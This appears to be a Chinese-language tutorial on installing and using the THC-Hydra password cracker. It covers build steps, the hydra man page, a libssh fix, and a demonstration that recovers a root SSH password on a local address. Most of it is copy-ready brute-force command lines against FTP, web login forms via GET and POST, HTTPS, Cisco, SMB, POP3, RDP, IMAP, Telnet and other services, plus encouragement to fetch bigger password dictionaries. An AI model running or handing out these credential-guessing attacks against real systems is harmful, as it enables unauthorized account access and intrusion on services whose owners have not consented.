echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
mkdir -p /usr/local/bin
cp -f hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra pw-inspector
echo OK > /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK > /dev/null
sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/usr/local"|" dpl4hydra.sh > /usr/local/bin/dpl4hydra.sh
chmod 755 /usr/local/bin/dpl4hydra.sh
cp -f *.csv /usr/local/etc/
mkdir -p /usr/local/man/man1
cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1

到这里已经安装完成 可以man下hydra的使用方法

 [root@localhost hydra-7.4.2]# man hydra
HYDRA(1) HYDRA(1) NAME
hydra - a very fast network logon cracker which support many different services SYNOPSIS
hydra
[[[-l LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT]] | [-C FILE]] [-e nsr]
[-u] [-f] [-F] [-M FILE] [-o FILE] [-t TASKS] [-w TIME] [-W TIME]
[-s PORT] [-S] [-4/6] [-vV] [-d]
server service [OPTIONAL_SERVICE_PARAMETER] DESCRIPTION
Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is
flexible and very fast. This tool gives researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from
remote to a system. Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, FTPS,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY,
HTTP-PROXY-URLENUM, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP,
Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES,
RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP,
SOCKS5, SSH(v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet,
VMware-Auth, VNC and XMPP.
For most protocols, SSL mode is available (e.g. https-get, ftp-ssl, etc.)
If not all necessary libraries are found during compile time, your
available services will be less. Type "hydra" to see what is available. Options
target a target to attack, can be an IPv4 address, IPv6 address or DNS name. service
a service to attack, see the list of protocols available OPTIONAL SERVICE PARAMETER
Some modules have optional or mandatory options. type "hydra -U <servicename>"
to get help on on the options of a service. -R restore a previously aborted session. Requires a hydra.restore file was written. No other options are allowed when using -R
继续从上一次进度接着破解 -S connect via SSL
大写,采用SSL链接
-s PORT
if the service is on a different default port, define it here 小写,可通过这个参数指定非默认端口 -l LOGIN
or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS
or -P FILE try password PASS, or load several passwords from FILE -x min:max:charset
generate passwords from min to max length. charset can contain 1
for numbers, a for lowcase and A for upcase characters.
Any other character is added is put to the list.
Example: 1:2:a1%.
The generated passwords will be of length 1 to 2 and contain
lowcase letters, numbers and/or percent signs and dots. -e nsr additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass -C FILE
colon separated "login:pass" format, instead of -L/-P options -u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so
the first password is tried on all logins, then the next password. -f exit after the first found login/password pair (per host if -M) -F exit after the first found login/password pair for any host (for usage with -M) -M FILE
server list for parallel attacks, one entry per line -o FILE
write found login/password pairs to FILE instead of stdout -t TASKS
run TASKS number of connects in parallel (default: 16) -w TIME
defines the max wait time in seconds for responses (default: 32) -w TIME
defines a wait time between each connection a task performs. This usually only makes sense if a low task number is used, .e.g
-t 1 -4 / -6
prefer IPv4 (default) or IPv6 addresses -v / -V
verbose mode / show login+pass combination for each attempt -d debug mode -h, --help
Show summary of options. SEE ALSO
xhydra(1), pw-inspector(1).
The programs are documented fully by van Hauser <vh@thc.org> AUTHOR
hydra was written by van Hauser / THC <vh@thc.org> and is co-maintained by David Maciejak <david.maciejak@gmail.com>. This manual page was written by Daniel Echeverry <epsilon77@gmail.com>, for the Debian project (and may be used by others). 24/05/2012 HYDRA(1)

下面来演示下破解;

首先本人只是实验没有真正的去网上下载密码库字典,手动写了两个文件 users.txt和password.txt

 [root@localhost hydra-7.4.2]# cat users.txt
root
[root@localhost hydra-7.4.2]# cat password.txt
111...AAA
111...aaa
abcdddccc
baidu.com
DELL2012.
ddddaaa11

不过在运行命令的时候报错了0 0!

[root@localhost~]#hydra 192.168.1.253 ssh -l  root -p passwrod.txt
[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!

 提示没有libssh这个支持 真的吗?

[root@localhost ~]#rpm -qa |grep libssh*
查看是什么都没有- -!
好嘛yum下试试
[root@localhost ~]#yum -y install libssh*
Loaded plugins: fastestmirror, refresh-packagekit
Loading mirror speeds from cached hostfile
* base: mirrors.btte.net
* extras: mirrors.btte.net
* updates: centos.ustc.edu.cn
Setting up Install Process
No package libssh-0.4.8 available.
No package libssh-0.4.8.tar.gz available.
Error: Nothing to do
呵呵 原来没有rpm包只有源码
查看了下网上找下
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
 
tar zxvf libssh-0.4.8.tar.gz
 
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
这个可行,不过我cp代码提示错误 只好手工敲了一遍OK可以安装成功!

然后重新编译下hydra 进入到解压目录

cd ../../hydra-7.4.2/

然后执行 make clean

 然后执行 经典三部曲
./configure
make && make install
安装如无报错跟上文编译提示一样。
好了OK现在安装完毕
现在执行下试试
[root@localhost ~]# hydra 192.168.1.253 ssh -l root -P passwrod.txt
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-19 00:14:00
[DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.253 login: root password: DELL2012.
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-19 00:14:02 呵呵这里要说明下 password.txt是本人手写的强大的密码库可以去网上下载
[root@localhost ~]# cat passwrod.txt
adsadsa
sadsaqhjk
132321hj
dsads13213
DELL2012.
DSADJHK.
111...AAA
呵呵我的就这么几个密码数据所有破解起来是比较快的

当然上述只是一个实验,想要获取更好的体验效果可以下载更强大的密码库文件!

更多的使用技巧

五、其他类型密码破解

  • 破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  • get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
  • post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

  假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

  • 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  • 破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  • 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
  • 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
  • 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
  • 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
  • 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 破解telnet
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V